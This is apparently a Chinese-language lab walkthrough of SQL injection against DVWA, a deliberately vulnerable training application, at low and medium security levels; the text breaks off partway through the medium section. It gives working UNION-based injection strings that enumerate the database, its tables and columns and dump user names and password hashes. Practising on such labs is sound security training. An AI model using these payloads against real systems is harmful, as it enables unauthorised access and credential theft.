一、在low级别的安全下,对dvwa进行sql注入
1.判断漏洞类型
由此可知:sql注入漏洞类型为:'为边界的字符串型
2.判断列数和显示位
3.确定数据库:1' union select 1,database()-- -
4.查看数据库的表:1' union select 2,(select group_concat(table_name) from information_schema.tables where table_schema='dvwa')-- -
5.查看对应表的列:1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users')-- -
6.查看表中的用户名和密码:1' union select 1,(select group_concat(concat_ws(0x7e,user,password))from users)--
二、在medium级别的安全下,对dvwa进行sql注入
1.判断漏洞类型为字符串型
2.判断列数和显示位:2列2个显示位
3.查看数据库:bp抓包,进行修改,点击go,右边查看